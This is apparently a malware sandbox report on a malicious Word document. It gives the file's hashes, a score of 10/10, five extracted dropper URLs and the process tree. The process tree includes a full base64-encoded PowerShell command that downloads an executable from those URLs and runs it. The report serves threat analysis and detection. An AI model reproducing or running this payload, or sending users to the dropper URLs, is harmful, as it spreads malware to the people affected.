Overview

overview

10

Static

static

8

0212a69aee...e9.doc

windows7_x64

10

0212a69aee...e9.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    2s
  • max time network
    6s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    23-05-2022 16:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0212a69aeefb6354edbb728fbd3cb4ec28d88efcf7a3f343e3e67884fb9978e9.doc

  • Size

    174KB

  • MD5

    d7eb240f86f8883dfbc77ed13b4e9ba9

  • SHA1

    3d800e1b0e366d50dcfa7c9ae5cca0c1857db176

  • SHA256

    0212a69aeefb6354edbb728fbd3cb4ec28d88efcf7a3f343e3e67884fb9978e9

  • SHA512

    b5e51422d562c3e4162dbc415eba3d3522986710108b92535d2dcb98f6f1128704c45041d6ba373d868d9a8c90c166201a25f5601b45fb4c3bf273c3d78aacdf

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://sukuntextile.com/wp_old/v_N/
exe.dropper

http://www.astoriadrycleaning.com.sg/wp-content/S_4v/
exe.dropper

http://d1mension-capitaland.vn/wp-admin/Dm_C/
exe.dropper

http://xn--80ajoksa8ap9b.xn--p1ai/administrator/r4_iG/
exe.dropper

http://e3consulting.co.me/blogs/e9_6/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0212a69aeefb6354edbb728fbd3cb4ec28d88efcf7a3f343e3e67884fb9978e9.doc" /o ""
    1⤵
      PID:4984
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABkAHcAQQAxAEEAQQBBAEMAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnADQAdwAnACwAJwB3AEEAXwAnACwAJwBRACcAKQA7ACQAVwBCAF8AMQBCAFgAbwA9AE4AZQBgAHcAYAAtAG8AYgBgAEoAZQBDAHQAIAAoACcATgBlAHQALgBXAGUAJwArACcAYgAnACsAJwBDAGwAaQAnACsAJwBlAG4AJwArACcAdAAnACkAOwAkAGQAUQA0AEQANABRAFgAPQAoACIAewAyADcAfQB7ADIANQB9AHsAMwA0AH0AewAxADMAfQB7ADIAOAB9AHsAOQB9AHsAMgA2AH0AewAzAH0AewAyADQAfQB7ADEAMAB9AHsAMQA1AH0AewAxADIAfQB7ADEAMQB9AHsAMQA0AH0AewAxADYAfQB7ADEANwB9AHsAMgA5AH0AewAzADMAfQB7ADcAfQB7ADAAfQB7ADQAfQB7ADYAfQB7ADIAfQB7ADIAMQB9AHsAMwAwAH0AewAyADAAfQB7ADUAfQB7ADMAMQB9AHsAMgAyAH0AewAxADgAfQB7ADgAfQB7ADMAMgB9AHsAMQA5AH0AewAxAH0AewAyADMAfQAiACAALQBmACAAJwB0AHAAOgAvAC8AJwAsACcAYwBvAG4AcwB1AGwAdABpAG4AZwAuAGMAbwAuAG0AZQAvAGIAbABvAGcAcwAvACcALAAnADgAYQBwADkAYgAuAHgAbgAtAC0AcAAxAGEAaQAvAGEAJwAsACcAaAB0ACcALAAnAHgAJwAsACcAYQAnACwAJwBuAC0ALQA4ADAAYQBqAG8AawBzAGEAJwAsACcAaAB0ACcALAAnAF8AaQBHAC8AQABoAHQAdABwADoAJwAsACcAdgBfAE4AJwAsACcAbwByACcALAAnAF8ANAAnACwAJwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUwAnACwAJwAuAGMAbwBtACcALAAnAHYALwBAAGgAdAB0AHAAOgAvAC8AZAAxACcALAAnAGkAYQBkAHIAeQBjAGwAZQBhAG4AaQBuAGcALgBjAG8AbQAuAHMAZwAvACcALAAnAG0AZQBuAHMAaQBvAG4ALQBjAGEAJwAsACcAcABpAHQAYQBsACcALAAnAHIALwByADQAJwAsACcAZQAzACcALAAnAHIAJwAsACcAZABtAGkAbgBpACcALAAnAG8AJwAsACcAZQA5AF8ANgAvACcALAAnAHQAcAA6AC8ALwB3AHcAdwAuAGEAcwB0ACcALAAnAHUAawAnACwAJwAvAEAAJwAsACcAaAB0AHQAcAA6AC8ALwBzACcALAAnAC8AdwBwAF8AbwBsAGQALwAnACwAJwBhAG4AZAAuACcALAAnAHMAdAAnACwAJwB0ACcALAAnAC8ALwAnACwAJwB2AG4ALwB3AHAALQBhAGQAbQBpAG4ALwBEAG0AXwBDAC8AQAAnACwAJwB1AG4AdABlAHgAdABpAGwAZQAnACkALgAiAFMAUABgAEwASQBUACIAKAAnAEAAJwApADsAJABhAEIAXwBBAFUAQgBaAEEAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBwAEEAQQBBACcALAAnAEIAQgB3ACcAKQA7ACQAagBVAFUAQQBEAEEANABrACAAPQAgACcAMwA1ADEAJwA7ACQAcABBAEEAQQBrAG8AeAA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAHcAWABvACcALAAnAHcAWgAnACwAJwBjAFEANAAnACkAOwAkAGQAQQBBADQAQQBDAGsAQgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAagBVAFUAQQBEAEEANABrACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAuAGUAeAAnACwAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFAAQQBBAEEAQQBBACAAaQBuACAAJABkAFEANABEADQAUQBYACkAewB0AHIAeQB7ACQAVwBCAF8AMQBCAFgAbwAuACIARABPAFcATgBMAG8AYABBAGQAZgBgAEkAYABMAEUAIgAoACQAUABBAEEAQQBBAEEALAAgACQAZABBAEEANABBAEMAawBCACkAOwAkAFIAQQBBAF8AQgBBAFUAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQBaAEEAJwAsACcAegBBAEIAJwApADsASQBmACAAKAAoAGcAZQB0AGAALQBpAGAAVABlAE0AIAAkAGQAQQBBADQAQQBDAGsAQgApAC4AIgBMAGUAYABOAGAARwB0AEgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AGkAbgB2AG8ASwBFAGAALQBgAEkAYABUAGUAbQAgACQAZABBAEEANABBAEMAawBCADsAJABqADEAQQBBAEIAQQBBAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnADQAQQAnACwAJwB3ACcALAAnAEEAeABYACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABVAEEAQQBHAEEAeABVAEcAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAEEARABYAEEAdwAnACwAJwBOAEQAJwAsACcAUQAnACkAOwA=
      1⤵
      • Process spawned unexpected child process
      PID:4252

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4252-138-0x000001E3476C0000-0x000001E3476E2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4252-139-0x00007FF8B0F30000-0x00007FF8B19F1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4984-130-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4984-134-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4984-133-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4984-132-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4984-131-0x00007FF89C9D0000-0x00007FF89C9E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4984-135-0x00007FF89A150000-0x00007FF89A160000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4984-136-0x00007FF89A150000-0x00007FF89A160000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4984-137-0x00000278F62D0000-0x00000278F62D4000-memory.dmp

      Filesize

      16KB

      Download